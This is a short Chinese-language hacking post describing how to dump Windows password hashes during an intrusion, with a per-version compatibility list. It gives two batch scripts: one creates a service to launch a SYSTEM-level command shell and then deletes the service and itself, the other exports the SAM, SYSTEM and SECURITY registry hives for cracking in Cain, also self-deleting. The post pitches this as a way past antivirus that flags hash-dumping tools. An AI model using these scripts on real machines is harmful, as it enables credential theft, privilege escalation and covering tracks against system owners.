入侵技巧导出系统注册表抓Hash

作者：TheLostMind
看到一篇文章，渗透中另一种抓系统密码HASH的技巧，提到导出注册表永CAIN来破密码，这对很多抓hash的工具被杀了，自己又不会做免杀的大牛来说，是个福音，其实这个很早以前就有了，貌似是老外提出了的，只是没有引起注意。
作者说这个方法不是通杀的：
Windows2000SP4(admin)=accessdenied

WindowsXPSP2(admin)=accessdenied

WindowsXPSP3(admin)=accessdenied

Windows2003R2SP2(admin)=works

WindowsVistaSP2(UAC/admin)=works

Windows2008SP1(admin)=works

Windows7(UAC/admin)=works
对用户权限有要求，默认XPSP3是导出不了的，我本地测试了，但是system权限是可以的，那么咱可以创建一个system权限运行的CMD，然后再导出就OK了。
其他系统上面没有测试过，大家自己整吧。
首先创建一个系统权限执行的CMD：
 
[pre]======================StartSystemCmd.bat=========  sc Create systemcmd binPath= "cmd /K start" type= own type= interact sc start systemcmd sc delete systemcmd del %0  =======================END=========================  然后导出文件。  ==================SaveReg.bat=======================  @echo off reg save hklm\sam sam.hive reg save hklm\system system.hive  reg save hklm\security security.hive del %0  =====================END============================ [/pre]
然后倒入到CAIN里面破吧。
*